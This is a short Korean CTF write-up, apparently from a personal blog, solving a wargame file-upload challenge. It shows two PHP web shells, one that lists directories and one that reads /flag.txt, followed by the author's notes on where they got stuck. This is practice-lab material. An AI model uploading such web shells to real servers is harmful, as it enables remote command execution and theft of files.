-문제소스
+upload.php
+list.php
+index.php
-풀이
-----------------------------------------------------------------------------------------------------------------------------------
<?php
system("cd ../../../../../;pwd;ls");
?>
다음 4.php파일을 업로드한 후에 리스트에서 4.php파일을 확인한 결과
-----------------------------------------------------------------------------------------------------------------------------------
<?php
system("cat /flag.txt");
?>
다음 소스코드의 php파일을 업로드 하면 flag를 획득할 수 있다.
-막힌부분
문제에서 /flag.txt에 flag가 존재한다고 되어있는데 /의 존재 의미를 제대로 파악하지 못 했다.
ls 명령어 cd ../;ls명령어를 쓰면서 삽질했다.
(rarCTF)ret2winrars (0) | 2021.08.07 |
---|---|
(Dreamhack :: Webhacking) Mango (0) | 2021.05.26 |
(Dreamhack:Webhacking)command-injection-1 (0) | 2021.05.19 |
(Dreamhack:Webhacking)file-download-1 (0) | 2021.05.19 |
(Dreamhack:Webhacking)xss-1 (0) | 2021.05.19 |